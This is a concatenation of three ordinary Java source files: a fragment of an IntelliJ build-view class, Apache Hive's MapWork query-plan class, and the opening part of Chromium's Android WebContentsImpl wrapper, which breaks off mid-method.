myBuildsList.setSelectedIndex(navigator.first);
return navigator.second.get();
}
return null;
}
@Override
public @NotNull String getNextOccurenceActionName() {
return IdeBundle.message("action.next.problem");
}
@Override
public @NotNull String getPreviousOccurenceActionName() {
return IdeBundle.message("action.previous.problem");
}
}
private class ProgressWatcher implements Runnable {
private final Alarm myRefreshAlarm = new Alarm(Alarm.ThreadToUse.SWING_THREAD);
private final Set<AbstractViewManager.BuildInfo> myBuilds = ContainerUtil.newConcurrentSet();
@Override
public void run() {
myRefreshAlarm.cancelAllRequests();
JComponent firstComponent = myThreeComponentsSplitter.getFirstComponent();
if (firstComponent != null) {
firstComponent.revalidate();
firstComponent.repaint();
}
if (!myBuilds.isEmpty()) {
myRefreshAlarm.addRequest(this, 300);
}
}
void addBuild(AbstractViewManager.BuildInfo buildInfo) {
myBuilds.add(buildInfo);
if (myBuilds.size() > 1) {
myRefreshAlarm.cancelAllRequests();
myRefreshAlarm.addRequest(this, 300);
}
}
void stopBuild(AbstractViewManager.BuildInfo buildInfo) {
myBuilds.remove(buildInfo);
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hive.ql.plan;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.LinkedHashMap;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.conf.HiveConf;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator;
import org.apache.hadoop.hive.ql.exec.Operator;
import org.apache.hadoop.hive.ql.exec.OperatorUtils;
import org.apache.hadoop.hive.ql.optimizer.physical.BucketingSortingCtx.BucketCol;
import org.apache.hadoop.hive.ql.optimizer.physical.BucketingSortingCtx.SortCol;
import org.apache.hadoop.hive.ql.parse.SplitSample;
import org.apache.hadoop.mapred.JobConf;
import com.google.common.collect.Interner;
/**
* MapWork represents all the information used to run a map task on the cluster.
* It is first used when the query planner breaks the logical plan into tasks and
* used throughout physical optimization to track map-side operator plans, input
* paths, aliases, etc.
*
* ExecDriver will serialize the contents of this class and make sure it is
* distributed on the cluster. The ExecMapper will ultimately deserialize this
* class on the data nodes and set up its operator pipeline accordingly.
*
* This class is also used in the explain command: any property with the
* appropriate annotation will be displayed in the explain output.
*/
@SuppressWarnings({"serial", "deprecation"})
public class MapWork extends BaseWork {
private static final Log LOG = LogFactory.getLog(MapWork.class);
private boolean hadoopSupportsSplittable;
// use LinkedHashMap to make sure the iteration order is
// deterministic, to ease testing
private LinkedHashMap<String, ArrayList<String>> pathToAliases = new LinkedHashMap<String, ArrayList<String>>();
private LinkedHashMap<String, PartitionDesc> pathToPartitionInfo = new LinkedHashMap<String, PartitionDesc>();
private LinkedHashMap<String, Operator<? extends OperatorDesc>> aliasToWork = new LinkedHashMap<String, Operator<? extends OperatorDesc>>();
private LinkedHashMap<String, PartitionDesc> aliasToPartnInfo = new LinkedHashMap<String, PartitionDesc>();
private HashMap<String, SplitSample> nameToSplitSample = new LinkedHashMap<String, SplitSample>();
// If this map task has a FileSinkOperator, and bucketing/sorting metadata can be
// inferred about the data being written by that operator, these are mappings from the directory
// that operator writes into to the bucket/sort columns for that data.
private final Map<String, List<BucketCol>> bucketedColsByDirectory =
new HashMap<String, List<BucketCol>>();
private final Map<String, List<SortCol>> sortedColsByDirectory =
new HashMap<String, List<SortCol>>();
private Path tmpHDFSPath;
private String inputformat;
private String indexIntermediateFile;
private Integer numMapTasks;
private Long maxSplitSize;
private Long minSplitSize;
private Long minSplitSizePerNode;
private Long minSplitSizePerRack;
//use sampled partitioning
private int samplingType;
public static final int SAMPLING_ON_PREV_MR = 1; // todo HIVE-3841
public static final int SAMPLING_ON_START = 2; // sampling on task running
// the following two are used for join processing
private boolean leftInputJoin;
private String[] baseSrc;
private List<String> mapAliases;
private boolean mapperCannotSpanPartns;
// used to indicate the input is sorted, and so a BinarySearchRecordReader should be used
private boolean inputFormatSorted = false;
private boolean useBucketizedHiveInputFormat;
private boolean useOneNullRowInputFormat;
private boolean dummyTableScan = false;
// used for dynamic partitioning
private Map<String, List<TableDesc>> eventSourceTableDescMap =
new LinkedHashMap<String, List<TableDesc>>();
private Map<String, List<String>> eventSourceColumnNameMap =
new LinkedHashMap<String, List<String>>();
private Map<String, List<ExprNodeDesc>> eventSourcePartKeyExprMap =
new LinkedHashMap<String, List<ExprNodeDesc>>();
private boolean doSplitsGrouping = true;
public MapWork() {}
public MapWork(String name) {
super(name);
}
@Explain(displayName = "Path -> Alias", normalExplain = false)
public LinkedHashMap<String, ArrayList<String>> getPathToAliases() {
return pathToAliases;
}
public void setPathToAliases(
final LinkedHashMap<String, ArrayList<String>> pathToAliases) {
this.pathToAliases = pathToAliases;
}
/**
* This is used to display and verify the output of "Path -> Alias" in the test framework.
*
* QTestUtil masks "Path -> Alias" and makes verification impossible.
* To work around this, "Path -> Alias" is kept intact and a new display name is added
* whose paths are not masked by QTestUtil, because the warehouse prefix is removed.
*
* Note: intermediate directories are still masked.
*
* @return the path-to-alias map with the warehouse prefix removed from each path
*/
@Explain(displayName = "Truncated Path -> Alias", normalExplain = false)
public Map<String, ArrayList<String>> getTruncatedPathToAliases() {
Map<String, ArrayList<String>> trunPathToAliases = new LinkedHashMap<String,
ArrayList<String>>();
Iterator<Entry<String, ArrayList<String>>> itr = this.pathToAliases.entrySet().iterator();
while (itr.hasNext()) {
final Entry<String, ArrayList<String>> entry = itr.next();
String origiKey = entry.getKey();
String newKey = PlanUtils.removePrefixFromWarehouseConfig(origiKey);
ArrayList<String> value = entry.getValue();
trunPathToAliases.put(newKey, value);
}
return trunPathToAliases;
}
@Explain(displayName = "Path -> Partition", normalExplain = false)
public LinkedHashMap<String, PartitionDesc> getPathToPartitionInfo() {
return pathToPartitionInfo;
}
public void setPathToPartitionInfo(
final LinkedHashMap<String, PartitionDesc> pathToPartitionInfo) {
this.pathToPartitionInfo = pathToPartitionInfo;
}
/**
* Derive additional attributes to be rendered by EXPLAIN.
* TODO: this method is relied upon by custom input formats to set jobconf properties.
* This is madness? - This is Hive Storage Handlers!
*/
public void deriveExplainAttributes() {
if (pathToPartitionInfo != null) {
for (Map.Entry<String, PartitionDesc> entry : pathToPartitionInfo
.entrySet()) {
entry.getValue().deriveBaseFileName(entry.getKey());
}
}
MapredLocalWork mapLocalWork = getMapRedLocalWork();
if (mapLocalWork != null) {
mapLocalWork.deriveExplainAttributes();
}
}
public void internTable(Interner<TableDesc> interner) {
if (aliasToPartnInfo != null) {
for (PartitionDesc part : aliasToPartnInfo.values()) {
if (part == null) {
continue;
}
part.intern(interner);
}
}
if (pathToPartitionInfo != null) {
for (PartitionDesc part : pathToPartitionInfo.values()) {
part.intern(interner);
}
}
}
/**
* @return the aliasToPartnInfo
*/
public LinkedHashMap<String, PartitionDesc> getAliasToPartnInfo() {
return aliasToPartnInfo;
}
/**
* @param aliasToPartnInfo
* the aliasToPartnInfo to set
*/
public void setAliasToPartnInfo(
LinkedHashMap<String, PartitionDesc> aliasToPartnInfo) {
this.aliasToPartnInfo = aliasToPartnInfo;
}
public LinkedHashMap<String, Operator<? extends OperatorDesc>> getAliasToWork() {
return aliasToWork;
}
public void setAliasToWork(
final LinkedHashMap<String, Operator<? extends OperatorDesc>> aliasToWork) {
this.aliasToWork = aliasToWork;
}
@Explain(displayName = "Split Sample", normalExplain = false)
public HashMap<String, SplitSample> getNameToSplitSample() {
return nameToSplitSample;
}
public void setNameToSplitSample(HashMap<String, SplitSample> nameToSplitSample) {
this.nameToSplitSample = nameToSplitSample;
}
public Integer getNumMapTasks() {
return numMapTasks;
}
public void setNumMapTasks(Integer numMapTasks) {
this.numMapTasks = numMapTasks;
}
@SuppressWarnings("nls")
public void addMapWork(String path, String alias, Operator<?> work,
PartitionDesc pd) {
ArrayList<String> curAliases = pathToAliases.get(path);
if (curAliases == null) {
assert (pathToPartitionInfo.get(path) == null);
curAliases = new ArrayList<String>();
pathToAliases.put(path, curAliases);
pathToPartitionInfo.put(path, pd);
} else {
assert (pathToPartitionInfo.get(path) != null);
}
for (String oneAlias : curAliases) {
if (oneAlias.equals(alias)) {
throw new RuntimeException("Multiple aliases named: " + alias
+ " for path: " + path);
}
}
curAliases.add(alias);
if (aliasToWork.get(alias) != null) {
throw new RuntimeException("Existing work for alias: " + alias);
}
aliasToWork.put(alias, work);
}
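// Illustrative sketch, not part of the original class: registering one alias for an input
// path. The tableScanOp and partDesc instances are assumed to be built elsewhere by the
// query planner; the path and alias values are hypothetical.
//
//   MapWork mapWork = new MapWork("Map 1");
//   mapWork.addMapWork("/warehouse/src", "src", tableScanOp, partDesc);
//   // Registering the same alias again for the same path would throw a RuntimeException.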
public boolean isInputFormatSorted() {
return inputFormatSorted;
}
public void setInputFormatSorted(boolean inputFormatSorted) {
this.inputFormatSorted = inputFormatSorted;
}
public void resolveDynamicPartitionStoredAsSubDirsMerge(HiveConf conf, Path path,
TableDesc tblDesc, ArrayList<String> aliases, PartitionDesc partDesc) {
pathToAliases.put(path.toString(), aliases);
pathToPartitionInfo.put(path.toString(), partDesc);
}
/**
* For each map-side operator, stores the alias the operator is working on
* behalf of in the operator runtime state. This is used by the reduce sink
* operator, but could be useful for debugging as well.
*/
private void setAliases() {
if(aliasToWork == null) {
return;
}
for (String oneAlias : aliasToWork.keySet()) {
aliasToWork.get(oneAlias).setAlias(oneAlias);
}
}
@Explain(displayName = "Execution mode")
public String getVectorModeOn() {
return vectorMode ? "vectorized" : null;
}
@Override
public void replaceRoots(Map<Operator<?>, Operator<?>> replacementMap) {
LinkedHashMap<String, Operator<?>> newAliasToWork = new LinkedHashMap<String, Operator<?>>();
for (Map.Entry<String, Operator<?>> entry: aliasToWork.entrySet()) {
newAliasToWork.put(entry.getKey(), replacementMap.get(entry.getValue()));
}
setAliasToWork(newAliasToWork);
}
@Override
@Explain(displayName = "Map Operator Tree")
public Set<Operator<?>> getAllRootOperators() {
Set<Operator<?>> opSet = new LinkedHashSet<Operator<?>>();
Map<String, ArrayList<String>> pa = getPathToAliases();
if (pa != null) {
for (List<String> ls : pa.values()) {
for (String a : ls) {
Operator<?> op = getAliasToWork().get(a);
if (op != null ) {
opSet.add(op);
}
}
}
}
return opSet;
}
public void mergeAliasedInput(String alias, String pathDir, PartitionDesc partitionInfo) {
ArrayList<String> aliases = pathToAliases.get(pathDir);
if (aliases == null) {
aliases = new ArrayList<String>(Arrays.asList(alias));
pathToAliases.put(pathDir, aliases);
pathToPartitionInfo.put(pathDir, partitionInfo);
} else {
aliases.add(alias);
}
}
public void initialize() {
setAliases();
}
public Long getMaxSplitSize() {
return maxSplitSize;
}
public void setMaxSplitSize(Long maxSplitSize) {
this.maxSplitSize = maxSplitSize;
}
public Long getMinSplitSize() {
return minSplitSize;
}
public void setMinSplitSize(Long minSplitSize) {
this.minSplitSize = minSplitSize;
}
public Long getMinSplitSizePerNode() {
return minSplitSizePerNode;
}
public void setMinSplitSizePerNode(Long minSplitSizePerNode) {
this.minSplitSizePerNode = minSplitSizePerNode;
}
public Long getMinSplitSizePerRack() {
return minSplitSizePerRack;
}
public void setMinSplitSizePerRack(Long minSplitSizePerRack) {
this.minSplitSizePerRack = minSplitSizePerRack;
}
public String getInputformat() {
return inputformat;
}
public void setInputformat(String inputformat) {
this.inputformat = inputformat;
}
public boolean isUseBucketizedHiveInputFormat() {
return useBucketizedHiveInputFormat;
}
public void setUseBucketizedHiveInputFormat(boolean useBucketizedHiveInputFormat) {
this.useBucketizedHiveInputFormat = useBucketizedHiveInputFormat;
}
public void setUseOneNullRowInputFormat(boolean useOneNullRowInputFormat) {
this.useOneNullRowInputFormat = useOneNullRowInputFormat;
}
public boolean isUseOneNullRowInputFormat() {
return useOneNullRowInputFormat;
}
public void setMapperCannotSpanPartns(boolean mapperCannotSpanPartns) {
this.mapperCannotSpanPartns = mapperCannotSpanPartns;
}
public boolean isMapperCannotSpanPartns() {
return this.mapperCannotSpanPartns;
}
public boolean getHadoopSupportsSplittable() {
return hadoopSupportsSplittable;
}
public void setHadoopSupportsSplittable(boolean hadoopSupportsSplittable) {
this.hadoopSupportsSplittable = hadoopSupportsSplittable;
}
public String getIndexIntermediateFile() {
return indexIntermediateFile;
}
public ArrayList<String> getAliases() {
return new ArrayList<String>(aliasToWork.keySet());
}
public ArrayList<Operator<?>> getWorks() {
return new ArrayList<Operator<?>>(aliasToWork.values());
}
public ArrayList<String> getPaths() {
return new ArrayList<String>(pathToAliases.keySet());
}
public ArrayList<PartitionDesc> getPartitionDescs() {
return new ArrayList<PartitionDesc>(aliasToPartnInfo.values());
}
public Path getTmpHDFSPath() {
return tmpHDFSPath;
}
public void setTmpHDFSPath(Path tmpHDFSPath) {
this.tmpHDFSPath = tmpHDFSPath;
}
public void mergingInto(MapWork mapWork) {
// currently, this is the sole field affecting the mergee task
mapWork.useBucketizedHiveInputFormat |= useBucketizedHiveInputFormat;
}
@Explain(displayName = "Path -> Bucketed Columns", normalExplain = false)
public Map<String, List<BucketCol>> getBucketedColsByDirectory() {
return bucketedColsByDirectory;
}
@Explain(displayName = "Path -> Sorted Columns", normalExplain = false)
public Map<String, List<SortCol>> getSortedColsByDirectory() {
return sortedColsByDirectory;
}
public void addIndexIntermediateFile(String fileName) {
if (this.indexIntermediateFile == null) {
this.indexIntermediateFile = fileName;
} else {
this.indexIntermediateFile += "," + fileName;
}
}
public int getSamplingType() {
return samplingType;
}
public void setSamplingType(int samplingType) {
this.samplingType = samplingType;
}
@Explain(displayName = "Sampling", normalExplain = false)
public String getSamplingTypeString() {
return samplingType == 1 ? "SAMPLING_ON_PREV_MR" :
samplingType == 2 ? "SAMPLING_ON_START" : null;
}
@Override
public void configureJobConf(JobConf job) {
for (PartitionDesc partition : aliasToPartnInfo.values()) {
PlanUtils.configureJobConf(partition.getTableDesc(), job);
}
Collection<Operator<?>> mappers = aliasToWork.values();
for (FileSinkOperator fs : OperatorUtils.findOperators(mappers, FileSinkOperator.class)) {
PlanUtils.configureJobConf(fs.getConf().getTableInfo(), job);
}
}
public void logPathToAliases() {
if (LOG.isDebugEnabled()) {
LOG.debug("LOGGING PATH TO ALIASES");
for (Map.Entry<String, ArrayList<String>> entry: pathToAliases.entrySet()) {
for (String a: entry.getValue()) {
LOG.debug("Path: " + entry.getKey() + ", Alias: " + a);
}
}
}
}
public void setDummyTableScan(boolean dummyTableScan) {
this.dummyTableScan = dummyTableScan;
}
public boolean getDummyTableScan() {
return dummyTableScan;
}
public void setEventSourceTableDescMap(Map<String, List<TableDesc>> map) {
this.eventSourceTableDescMap = map;
}
public Map<String, List<TableDesc>> getEventSourceTableDescMap() {
return eventSourceTableDescMap;
}
public void setEventSourceColumnNameMap(Map<String, List<String>> map) {
this.eventSourceColumnNameMap = map;
}
public Map<String, List<String>> getEventSourceColumnNameMap() {
return eventSourceColumnNameMap;
}
public Map<String, List<ExprNodeDesc>> getEventSourcePartKeyExprMap() {
return eventSourcePartKeyExprMap;
}
public void setEventSourcePartKeyExprMap(Map<String, List<ExprNodeDesc>> map) {
this.eventSourcePartKeyExprMap = map;
}
public void setDoSplitsGrouping(boolean doSplitsGrouping) {
this.doSplitsGrouping = doSplitsGrouping;
}
public boolean getDoSplitsGrouping() {
return this.doSplitsGrouping;
}
public boolean isLeftInputJoin() {
return leftInputJoin;
}
public void setLeftInputJoin(boolean leftInputJoin) {
this.leftInputJoin = leftInputJoin;
}
public String[] getBaseSrc() {
return baseSrc;
}
public void setBaseSrc(String[] baseSrc) {
this.baseSrc = baseSrc;
}
public List<String> getMapAliases() {
return mapAliases;
}
public void setMapAliases(List<String> mapAliases) {
this.mapAliases = mapAliases;
}
}
|
|
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.content.browser.webcontents;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.Rect;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.os.Parcel;
import android.os.ParcelUuid;
import android.os.Parcelable;
import android.view.Surface;
import android.view.ViewStructure;
import androidx.annotation.Nullable;
import androidx.annotation.VisibleForTesting;
import org.chromium.base.Log;
import org.chromium.base.ThreadUtils;
import org.chromium.base.UserData;
import org.chromium.base.UserDataHost;
import org.chromium.base.annotations.CalledByNative;
import org.chromium.base.annotations.JNINamespace;
import org.chromium.base.annotations.NativeMethods;
import org.chromium.blink_public.input.SelectionGranularity;
import org.chromium.content.browser.AppWebMessagePort;
import org.chromium.content.browser.MediaSessionImpl;
import org.chromium.content.browser.RenderCoordinatesImpl;
import org.chromium.content.browser.RenderWidgetHostViewImpl;
import org.chromium.content.browser.ViewEventSinkImpl;
import org.chromium.content.browser.WindowEventObserver;
import org.chromium.content.browser.WindowEventObserverManager;
import org.chromium.content.browser.accessibility.ViewStructureBuilder;
import org.chromium.content.browser.accessibility.WebContentsAccessibilityImpl;
import org.chromium.content.browser.framehost.RenderFrameHostDelegate;
import org.chromium.content.browser.framehost.RenderFrameHostImpl;
import org.chromium.content.browser.selection.SelectionPopupControllerImpl;
import org.chromium.content_public.browser.ChildProcessImportance;
import org.chromium.content_public.browser.GlobalRenderFrameHostId;
import org.chromium.content_public.browser.ImageDownloadCallback;
import org.chromium.content_public.browser.JavaScriptCallback;
import org.chromium.content_public.browser.MessagePort;
import org.chromium.content_public.browser.NavigationController;
import org.chromium.content_public.browser.RenderFrameHost;
import org.chromium.content_public.browser.ViewEventSink.InternalAccessDelegate;
import org.chromium.content_public.browser.Visibility;
import org.chromium.content_public.browser.WebContents;
import org.chromium.content_public.browser.WebContentsInternals;
import org.chromium.content_public.browser.WebContentsObserver;
import org.chromium.ui.OverscrollRefreshHandler;
import org.chromium.ui.base.EventForwarder;
import org.chromium.ui.base.ViewAndroidDelegate;
import org.chromium.ui.base.WindowAndroid;
import org.chromium.url.GURL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.UUID;
/**
* The WebContentsImpl Java wrapper to allow communicating with the native WebContentsImpl
* object.
*/
@JNINamespace("content")
public class WebContentsImpl implements WebContents, RenderFrameHostDelegate, WindowEventObserver {
private static final String TAG = "WebContentsImpl";
private static final String PARCEL_VERSION_KEY = "version";
private static final String PARCEL_WEBCONTENTS_KEY = "webcontents";
private static final String PARCEL_PROCESS_GUARD_KEY = "processguard";
private static final long PARCELABLE_VERSION_ID = 0;
// Non-final for testing purposes, so resetting of the UUID can happen.
private static UUID sParcelableUUID = UUID.randomUUID();
/**
* Used to reset the internal tracking of whether a serialized {@link WebContents}
* was created in this process.
*/
@VisibleForTesting
public static void invalidateSerializedWebContentsForTesting() {
sParcelableUUID = UUID.randomUUID();
}
/**
* A {@link android.os.Parcelable.Creator} instance that is used to build
* {@link WebContentsImpl} objects from a {@link Parcel}.
*/
// TODO(crbug.com/635567): Fix this properly.
@SuppressLint("ParcelClassLoader")
public static final Parcelable.Creator<WebContents> CREATOR =
new Parcelable.Creator<WebContents>() {
@Override
public WebContents createFromParcel(Parcel source) {
Bundle bundle = source.readBundle();
// Check the version.
if (bundle.getLong(PARCEL_VERSION_KEY, -1) != 0) return null;
// Check that we're in the same process.
ParcelUuid parcelUuid = bundle.getParcelable(PARCEL_PROCESS_GUARD_KEY);
if (sParcelableUUID.compareTo(parcelUuid.getUuid()) != 0) return null;
// Attempt to retrieve the WebContents object from the native pointer.
return WebContentsImplJni.get().fromNativePtr(
bundle.getLong(PARCEL_WEBCONTENTS_KEY));
}
@Override
public WebContents[] newArray(int size) {
return new WebContents[size];
}
};
/**
* Factory interface passed to {@link #getOrSetUserData()} for instantiating a
* class as user data.
*
* A constructor method reference comes in handy for class Foo to provide the factory.
* Use lazy initialization to avoid generating too many anonymous factory references.
*
* <code>
* public class Foo {
* static final class FooFactoryLazyHolder {
* private static final UserDataFactory<Foo> INSTANCE = Foo::new;
* }
* ....
*
* webContents.getOrSetUserData(Foo.class, FooFactoryLazyHolder.INSTANCE);
*
* ....
* }
* </code>
*
* @param <T> Class to instantiate.
*/
public interface UserDataFactory<T> { T create(WebContents webContents); }
// Note this list may be incomplete. Frames that never had to initialize the Java side would
// not have an entry here. This is here mainly to keep the Java RenderFrameHosts alive, since
// the native side generally cannot safely hold strong references to them.
private final List<RenderFrameHostImpl> mFrames = new ArrayList<>();
private long mNativeWebContentsAndroid;
private NavigationController mNavigationController;
// Lazily created proxy observer for handling all Java-based WebContentsObservers.
private WebContentsObserverProxy mObserverProxy;
// The media session for this WebContents. It is constructed by the native MediaSession and has
// the same lifetime as the native MediaSession.
private MediaSessionImpl mMediaSession;
class SmartClipCallback {
public SmartClipCallback(final Handler smartClipHandler) {
mHandler = smartClipHandler;
}
public void onSmartClipDataExtracted(String text, String html, Rect clipRect) {
// The clipRect is in dip scale here. Add the contentOffset in the same scale.
RenderCoordinatesImpl coordinateSpace = getRenderCoordinates();
clipRect.offset(0,
(int) (coordinateSpace.getContentOffsetYPix()
/ coordinateSpace.getDeviceScaleFactor()));
Bundle bundle = new Bundle();
bundle.putString("url", getVisibleUrl().getSpec());
bundle.putString("title", getTitle());
bundle.putString("text", text);
bundle.putString("html", html);
bundle.putParcelable("rect", clipRect);
Message msg = Message.obtain(mHandler, 0);
msg.setData(bundle);
msg.sendToTarget();
}
final Handler mHandler;
}
private SmartClipCallback mSmartClipCallback;
private EventForwarder mEventForwarder;
// Cached copy of all positions and scales as reported by the renderer.
private RenderCoordinatesImpl mRenderCoordinates;
private InternalsHolder mInternalsHolder;
private String mProductVersion;
private boolean mInitialized;
// Remember the stack from when the native pointer was cleared, for debugging use-after-destroy errors.
private Throwable mNativeDestroyThrowable;
private static class WebContentsInternalsImpl implements WebContentsInternals {
public UserDataHost userDataHost;
public ViewAndroidDelegate viewAndroidDelegate;
}
private WebContentsImpl(
long nativeWebContentsAndroid, NavigationController navigationController) {
assert nativeWebContentsAndroid != 0;
mNativeWebContentsAndroid = nativeWebContentsAndroid;
mNavigationController = navigationController;
}
@CalledByNative
private static WebContentsImpl create(
long nativeWebContentsAndroid, NavigationController navigationController) {
return new WebContentsImpl(nativeWebContentsAndroid, navigationController);
}
@Override
public void initialize(String productVersion, ViewAndroidDelegate viewDelegate,
InternalAccessDelegate accessDelegate, WindowAndroid windowAndroid,
InternalsHolder internalsHolder) {
assert internalsHolder != null;
mProductVersion = productVersion;
WebContentsInternalsImpl internals;
if (mInternalsHolder != null) {
internals = (WebContentsInternalsImpl) mInternalsHolder.get();
} else {
internals = new WebContentsInternalsImpl();
internals.userDataHost = new UserDataHost();
}
mInternalsHolder = internalsHolder;
mInternalsHolder.set(internals);
if (mRenderCoordinates == null) {
mRenderCoordinates = new RenderCoordinatesImpl();
}
mInitialized = true;
setViewAndroidDelegate(viewDelegate);
setTopLevelNativeWindow(windowAndroid);
if (accessDelegate == null) {
accessDelegate = new EmptyInternalAccessDelegate();
}
ViewEventSinkImpl.from(this).setAccessDelegate(accessDelegate);
if (windowAndroid != null) {
getRenderCoordinates().setDeviceScaleFactor(windowAndroid.getDisplay().getDipScale());
}
}
@Override
public void clearJavaWebContentsObservers() {
// Clear all the Android specific observers.
if (mObserverProxy != null) {
mObserverProxy.destroy();
mObserverProxy = null;
}
}
@Nullable
public Context getContext() {
assert mInitialized;
WindowAndroid window = getTopLevelNativeWindow();
return window != null ? window.getContext().get() : null;
}
public String getProductVersion() {
assert mInitialized;
return mProductVersion;
}
@CalledByNative
private void clearNativePtr() {
mNativeDestroyThrowable = new RuntimeException("clearNativePtr");
mNativeWebContentsAndroid = 0;
mNavigationController = null;
if (mObserverProxy != null) {
mObserverProxy.destroy();
mObserverProxy = null;
}
}
// =================== RenderFrameHostDelegate overrides ===================
@Override
public void renderFrameCreated(RenderFrameHostImpl host) {
assert !mFrames.contains(host);
mFrames.add(host);
}
@Override
public void renderFrameDeleted(RenderFrameHostImpl host) {
assert mFrames.contains(host);
mFrames.remove(host);
}
// ================= end RenderFrameHostDelegate overrides =================
@Override
public int describeContents() {
return 0;
}
@Override
public void writeToParcel(Parcel dest, int flags) {
// This is wrapped in a Bundle so that failed deserialization attempts don't corrupt the
// overall Parcel. If we failed a UUID or Version check and didn't read the rest of the
// fields it would corrupt the serialized stream.
Bundle data = new Bundle();
data.putLong(PARCEL_VERSION_KEY, PARCELABLE_VERSION_ID);
data.putParcelable(PARCEL_PROCESS_GUARD_KEY, new ParcelUuid(sParcelableUUID));
data.putLong(PARCEL_WEBCONTENTS_KEY, mNativeWebContentsAndroid);
dest.writeBundle(data);
}
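// Illustrative sketch, not part of the original class: a same-process Parcel round trip
// through the CREATOR above. createFromParcel() returns null if the version or the
// per-process UUID guard does not match.
//
//   Parcel parcel = Parcel.obtain();
//   webContents.writeToParcel(parcel, 0);
//   parcel.setDataPosition(0);
//   WebContents restored = WebContentsImpl.CREATOR.createFromParcel(parcel);
//   parcel.recycle();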
@CalledByNative
private long getNativePointer() {
return mNativeWebContentsAndroid;
}
@Override
public WindowAndroid getTopLevelNativeWindow() {
checkNotDestroyed();
return WebContentsImplJni.get().getTopLevelNativeWindow(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setTopLevelNativeWindow(WindowAndroid windowAndroid) {
checkNotDestroyed();
WebContentsImplJni.get().setTopLevelNativeWindow(
mNativeWebContentsAndroid, WebContentsImpl.this, windowAndroid);
WindowEventObserverManager.from(this).onWindowAndroidChanged(windowAndroid);
if (mObserverProxy != null) mObserverProxy.onTopLevelNativeWindowChanged(windowAndroid);
}
@Override
public ViewAndroidDelegate getViewAndroidDelegate() {
WebContentsInternals internals = mInternalsHolder.get();
if (internals == null) return null;
return ((WebContentsInternalsImpl) internals).viewAndroidDelegate;
}
private void setViewAndroidDelegate(ViewAndroidDelegate viewDelegate) {
checkNotDestroyed();
WebContentsInternals internals = mInternalsHolder.get();
assert internals != null;
WebContentsInternalsImpl impl = (WebContentsInternalsImpl) internals;
impl.viewAndroidDelegate = viewDelegate;
WebContentsImplJni.get().setViewAndroidDelegate(
mNativeWebContentsAndroid, WebContentsImpl.this, viewDelegate);
}
@Override
public void destroy() {
// Note that |WebContents.destroy| is not guaranteed to be invoked.
// Any resource whose release relies on this method will likely be leaked.
if (!ThreadUtils.runningOnUiThread()) {
throw new IllegalStateException("Attempting to destroy WebContents on non-UI thread");
}
if (mNativeWebContentsAndroid != 0) {
WebContentsImplJni.get().destroyWebContents(mNativeWebContentsAndroid);
}
}
@Override
public boolean isDestroyed() {
return mNativeWebContentsAndroid == 0
|| WebContentsImplJni.get().isBeingDestroyed(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void clearNativeReference() {
if (mNativeWebContentsAndroid != 0) {
WebContentsImplJni.get().clearNativeReference(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
}
@Override
public NavigationController getNavigationController() {
return mNavigationController;
}
@Override
public RenderFrameHost getMainFrame() {
checkNotDestroyed();
return WebContentsImplJni.get().getMainFrame(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public RenderFrameHost getFocusedFrame() {
checkNotDestroyed();
return WebContentsImplJni.get().getFocusedFrame(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public RenderFrameHost getRenderFrameHostFromId(GlobalRenderFrameHostId id) {
checkNotDestroyed();
return WebContentsImplJni.get().getRenderFrameHostFromId(
mNativeWebContentsAndroid, id.childId(), id.frameRoutingId());
}
// Returns every RenderFrameHost in this WebContents.
// See C++'s WebContents::ForEachRenderFrameHost for details.
public List<RenderFrameHost> getAllRenderFrameHosts() {
checkNotDestroyed();
RenderFrameHost[] frames = WebContentsImplJni.get().getAllRenderFrameHosts(
mNativeWebContentsAndroid, WebContentsImpl.this);
return Collections.unmodifiableList(Arrays.asList(frames));
}
@CalledByNative
private static RenderFrameHost[] createRenderFrameHostArray(int size) {
return new RenderFrameHost[size];
}
@CalledByNative
private static void addRenderFrameHostToArray(
RenderFrameHost[] frames, int index, RenderFrameHost frame) {
frames[index] = frame;
}
@Override
public @Nullable RenderWidgetHostViewImpl getRenderWidgetHostView() {
if (mNativeWebContentsAndroid == 0) return null;
RenderWidgetHostViewImpl rwhvi = WebContentsImplJni.get().getRenderWidgetHostView(
mNativeWebContentsAndroid, WebContentsImpl.this);
if (rwhvi == null || rwhvi.isDestroyed()) return null;
return rwhvi;
}
@Override
public List<WebContentsImpl> getInnerWebContents() {
checkNotDestroyed();
WebContentsImpl[] innerWebContents = WebContentsImplJni.get().getInnerWebContents(
mNativeWebContentsAndroid, WebContentsImpl.this);
return Collections.unmodifiableList(Arrays.asList(innerWebContents));
}
@Override
public @Visibility int getVisibility() {
checkNotDestroyed();
return WebContentsImplJni.get().getVisibility(mNativeWebContentsAndroid);
}
@Override
public String getTitle() {
checkNotDestroyed();
return WebContentsImplJni.get().getTitle(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public GURL getVisibleUrl() {
checkNotDestroyed();
return WebContentsImplJni.get().getVisibleURL(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public String getEncoding() {
checkNotDestroyed();
